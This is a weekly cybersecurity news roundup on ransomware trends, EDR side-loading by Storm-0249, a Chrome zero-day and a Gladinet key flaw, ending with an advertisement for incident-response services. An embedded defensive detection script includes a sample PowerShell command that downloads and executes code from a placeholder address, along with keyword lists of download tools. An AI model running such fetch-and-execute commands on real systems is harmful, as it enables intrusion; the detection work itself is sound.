News Week: December 8th to December 14th, 2025

December 15, 2025

Polish authorities detain suspects over alleged cyber intrusion attempts

Polish law enforcement has detained three Ukrainian nationals suspected of preparing cyber-related offenses involving sensitive systems. The men, aged between 39 and 43, were stopped during a routine check and reportedly raised suspicion due to their behavior and unclear travel explanations. A subsequent vehicle search led to the seizure of multiple electronic devices that investigators believe could be used for unauthorized access to IT and telecommunications networks. Among the confiscated items were laptops, routers, numerous SIM cards, portable storage devices, antennas, and specialized tools such as Flipper Zero hardware and a K19 RF/GS detection device. Authorities allege the equipment could facilitate data interception, signal manipulation, or surveillance detection. Although the seized data was encrypted, specialists from Poland’s cybercrime unit managed to secure digital evidence. The suspects claimed to work in IT but allegedly avoided answering detailed questions. Prosecutors have filed charges related to computer fraud and possession of tools intended for criminal use, with the suspects held in custody pending further investigation.

FinCEN report highlights shifting ransomware trends and enforcement impact

A recent analysis from FinCEN reveals that ransomware groups extorted more than $2.1 billion between 2022 and 2024, with activity cresting in 2023 before declining the following year. Drawing on thousands of Bank Secrecy Act filings, the report links the downturn in 2024 payments to coordinated law enforcement actions against major operations such as ALPHV/BlackCat and LockBit. While total incidents dipped only slightly, ransom payments fell sharply, suggesting increased disruption of criminal infrastructure. FinCEN identified 267 ransomware families overall, though a small group dominated both volume and revenue. Akira ransomware appeared most frequently in reports, while ALPHV/BlackCat generated the highest total payouts, followed by LockBit. Other notable groups included Black Basta, Royal, BianLian, Hive, Medusa, and Phobos. Collectively, the ten most active variants accounted for the majority of reported losses, underscoring how concentrated the ransomware ecosystem remains despite fragmentation.

New packing service enables stealthier delivery of security-disabling malware

Security researchers have observed a growing number of ransomware operations relying on a packer-as-a-service platform known as Shanya to conceal malware designed to neutralize endpoint defenses. Active since late 2024, the service wraps malicious payloads in heavily obfuscated executables that evade antivirus and EDR inspection, with confirmed use across multiple regions worldwide. Sophos telemetry links Shanya to several prominent ransomware groups, including Medusa, Qilin, Crytox, and Akira, the latter appearing most frequently. The packer encrypts and compresses payloads, decrypting them only in memory and embedding them into modified system files such as shell32.dll to avoid disk-based detection. It also incorporates anti-analysis techniques that deliberately crash debuggers used by security tools. In many cases, Shanya-packed loaders are delivered via DLL side-loading and deploy kernel drivers to disable security services before ransomware execution. Beyond ransomware, researchers also identified ClickFix campaigns using Shanya to distribute CastleRAT, highlighting its broader appeal within the cybercrime ecosystem.

Initial access broker leverages trusted security software to evade detection

Researchers have identified a sophisticated campaign in which an initial access broker known as Storm-0249 abuses endpoint detection and response software to quietly prepare systems for ransomware deployment. Analysis shows the actor shifting away from large-scale phishing toward more covert techniques that blend into normal system behavior. In attacks observed by ReliaQuest, victims were manipulated via ClickFix social engineering into executing commands that retrieved malicious components directly into memory. The operation relied on SentinelOne EDR binaries, using DLL side-loading to execute attacker-controlled code from within a trusted, signed process. This allowed malware execution, system profiling, and encrypted C2 communication to appear as legitimate security activity. Standard Windows utilities were then used to collect identifiers such as MachineGuid, which ransomware groups like LockBit and ALPHV reportedly use to bind encryption keys to specific targets. By abusing trusted EDR processes, Storm-0249 largely bypasses conventional monitoring, highlighting the need for behavior-based detection and stricter controls over tools like PowerShell and curl.
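The behaviour-based detections the passage calls for can be expressed over process-creation and image-load telemetry. The following is an added example, not ReliaQuest's or any vendor's detection content: it runs three rules over a constructed, Sysmon-like event set (field names are simplified, not Sysmon's exact schema) and correlates them by process ID, so a `reg query` for MachineGuid spawned by a process that was just flagged for side-loading scores higher than the same query from an admin's shell. The binary and DLL names, paths, the vendor string "SentinelOne" and the IP address are placeholders, not indicators from the campaign.

```python
# Behaviour-based detection for the tradecraft described above: a signed EDR binary
# side-loading a foreign DLL, a ClickFix-style in-memory download, and MachineGuid
# collection. Added example; event schema, names and paths are constructed placeholders.
import ntpath
from dataclasses import dataclass

USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\", "\\public\\")
DOWNLOAD_TOOLS = {"curl.exe", "powershell.exe", "pwsh.exe", "mshta.exe",
                  "certutil.exe", "bitsadmin.exe"}
NET_TOKENS = ("http://", "https://", "-urlcache", "downloadstring", "invoke-webrequest",
              "iwr ", "iex", "frombase64string", "-enc ", "-encodedcommand")


@dataclass
class Alert:
    rule: str
    pid: int
    detail: str


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def _user_writable(path):
    return any(tok in path.lower() for tok in USER_WRITABLE)


def rule_sideload(ev):
    """Signed process loads a DLL that is unsigned or signed by a different publisher,
    from a user-writable location or outside the process's own directory."""
    if ev["type"] != "ImageLoad" or not ev.get("process_signer"):
        return None
    dll, proc = ev["image_loaded"], ev["image"]
    foreign_signer = (ev.get("dll_signer") or "") != ev["process_signer"]
    if foreign_signer and (_dir(dll) != _dir(proc) or _user_writable(dll)):
        return Alert("sideload", ev["pid"],
                     f"{_base(proc)} signed by {ev['process_signer']} loaded {dll}")
    return None


def rule_clickfix_download(ev):
    """LOLBin fetching content over the network; parent explorer.exe means the command
    was typed/pasted into the Run dialog, the classic ClickFix delivery."""
    if ev["type"] != "ProcessCreate" or _base(ev["image"]) not in DOWNLOAD_TOOLS:
        return None
    cmd = ev["command_line"].lower()
    if not any(tok in cmd for tok in NET_TOKENS):
        return None
    via_run_dialog = _base(ev["parent_image"]) == "explorer.exe"
    return Alert("clickfix_download" if via_run_dialog else "lolbin_download",
                 ev["pid"], ev["command_line"])


def rule_machineguid(ev, suspicious_pids):
    """Host-identifier collection; escalated when the parent was already flagged."""
    if ev["type"] != "ProcessCreate" or "machineguid" not in ev["command_line"].lower():
        return None
    rule = "machineguid_from_sideloaded" if ev["parent_pid"] in suspicious_pids \
        else "machineguid_probe"
    return Alert(rule, ev["pid"], ev["command_line"])


def detect(events):
    """Run all rules in order; PIDs of flagged processes feed the correlation rule."""
    alerts, suspicious = [], set()
    for ev in events:
        for alert in (rule_sideload(ev), rule_clickfix_download(ev),
                      rule_machineguid(ev, suspicious)):
            if alert:
                alerts.append(alert)
                suspicious.add(alert.pid)
    return alerts


# Constructed sample telemetry (not real logs). EdrAgent.exe / helper.dll are placeholders.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "pid": 4100, "parent_pid": 2200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://203.0.113.10/x -UseBasicParsing)"'},
    {"type": "ImageLoad", "pid": 4188, "process_signer": "SentinelOne",
     "image": r"C:\Users\alice\AppData\Local\Temp\S1\EdrAgent.exe",
     "image_loaded": r"C:\Users\alice\AppData\Local\Temp\S1\helper.dll", "dll_signer": None},
    {"type": "ProcessCreate", "pid": 4300, "parent_pid": 4188,
     "image": r"C:\Windows\System32\reg.exe",
     "parent_image": r"C:\Users\alice\AppData\Local\Temp\S1\EdrAgent.exe",
     "command_line": r'reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid'},
    # Benign: the vendor binary in its install directory loading its own signed DLL.
    {"type": "ImageLoad", "pid": 900, "process_signer": "SentinelOne",
     "image": r"C:\Program Files\SentinelOne\Agent\EdrAgent.exe",
     "image_loaded": r"C:\Program Files\SentinelOne\Agent\core.dll", "dll_signer": "SentinelOne"},
    # Benign-looking: an admin shell reading MachineGuid; logged at low severity only.
    {"type": "ProcessCreate", "pid": 5000, "parent_pid": 4800,
     "image": r"C:\Windows\System32\reg.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"reg query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.rule}] pid={a.pid} {a.detail}")
```

The signer comparison is the load-bearing check: allow-listing the EDR vendor's binaries by path or hash does nothing here, because the process really is the vendor's signed executable; what is abnormal is a foreign, unsigned DLL loaded from a user-writable directory by that process. The same logic maps directly onto Sysmon Event ID 7 (`Signed`, `Signature`, `SignatureStatus` on the loaded image) and Event ID 1 for the process tree.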

U.S. charges individual over alleged support for pro-Russia cyber operations

U.S. authorities have brought charges against a Ukrainian national accused of assisting Russian-aligned hacktivist groups involved in cyberattacks against critical infrastructure worldwide. Prosecutors allege that Victoria Eduardovna Dubranova supported operations linked to NoName057(16) and CyberArmyofRussia_Reborn, groups tied to state-backed activity. According to the indictments, these collectives coordinated large-scale DDoS campaigns using custom tooling to disrupt government agencies, financial institutions, and essential services, including water systems and election-related infrastructure. Investigators say the attacks were organized with guidance and funding connected to Russian military intelligence, and relied on volunteer-driven platforms to amplify their impact. Dubranova has pleaded not guilty and is scheduled to stand trial in separate cases next year. U.S. officials emphasized that the charges underscore growing concerns over hacktivist-led DDoS activity evolving from online disruption into operations capable of causing real-world consequences, particularly when aimed at critical infrastructure sectors.

Emergency Chrome update addresses another actively exploited flaw

Google has issued an urgent security update for Chrome to remediate the eighth zero-day vulnerability exploited in real-world attacks this year. The high-severity flaw was fixed in the Stable Desktop channel across Windows, macOS, and Linux, with patched versions already available to users checking for updates. While Google has limited technical disclosure during the coordinated rollout, the issue lies in ANGLE (libANGLE), the graphics abstraction layer Chrome uses to translate WebGL calls to native graphics APIs, where improper buffer handling can cause memory corruption and potentially code execution. The vulnerability has been assigned CVE-2025-14174, and the same bug was also patched in parallel across multiple Apple operating systems. Google noted that details remain restricted until a majority of users are protected. This latest zero-day continues a troubling trend in 2025, following earlier fixes in Chrome’s V8 engine, sandbox mechanisms, and account security logic, underscoring sustained pressure on browser security from active threat campaigns.

Active exploitation targets cryptographic weakness in enterprise file-sharing software

Threat actors are actively exploiting a newly uncovered cryptographic weakness in Gladinet CentreStack and Triofox to gain unauthorized access and ultimately achieve remote code execution on affected servers. According to Huntress researchers, the issue stems from a custom AES-based ticket scheme in which the encryption key and initialization vector were hardcoded and identical across every installation, so a value extracted from any one copy of the product works against all of them. With these static values, attackers can decrypt or forge Access Tickets that contain sensitive data such as usernames, file paths, and credentials, allowing them to impersonate users. In observed attacks, forged tickets with non-expiring timestamps were used to retrieve configuration files, including web.config, whose ASP.NET machineKey then enables further compromise via a ViewState deserialization path. The activity has been linked to at least nine victim organizations across multiple sectors and is occurring alongside abuse of an older local file inclusion flaw, CVE-2025-30406. Gladinet has urged customers to update immediately, rotate machine keys (a leaked machineKey keeps the ViewState path open even after patching), and review logs for known indicators tied to this exploitation campaign.

Flawed debut exposes weaknesses in new pro-Russia ransomware operation

The pro-Russia hacktivist group CyberVolk has entered the cybercrime space with a ransomware-as-a-service (RaaS) offering called VolkLocker, but early analysis shows the operation is undermined by critical cryptographic mistakes. Researchers found that the ransomware relies on a single hardcoded master key embedded directly in the binary, which is also written in plaintext to a temporary file on infected systems. This implementation error allows some victims to recover encrypted data without paying a ransom, significantly weakening VolkLocker’s effectiveness. Marketed as part of CyberVolk’s renewed push into monetized cybercrime, the RaaS targets both Windows and Linux/VMware ESXi environments and includes destructive features such as timed data wiping. However, the exposed key management flaw suggests poor operational maturity. While this weakness may aid current victims, security experts expect CyberVolk to correct the issue quickly, as such errors are often resolved once publicly disclosed within active ransomware-as-a-service ecosystems.

Conclusion

The incidents outlined above highlight how diverse and persistent today’s cyber threats have become, ranging from ransomware operations and zero-day exploitation to abuse of trusted security tools and cryptographic flaws. As attackers continue to refine their techniques, organizations face increasing risks to critical systems, sensitive data, and operational continuity. Proactive defense, rapid detection, and expert-led response are now essential components of effective cybersecurity strategy.

As ransomware and cybersecurity experts, we support organizations before, during, and after an incident with specialized services such as Ransomware Recovery Services, Ransomware Negotiation Services, and an Incident Response Retainer. If you are facing an active attack or want to strengthen your preparedness, our team can provide fast, discreet, and expert assistance tailored to your needs.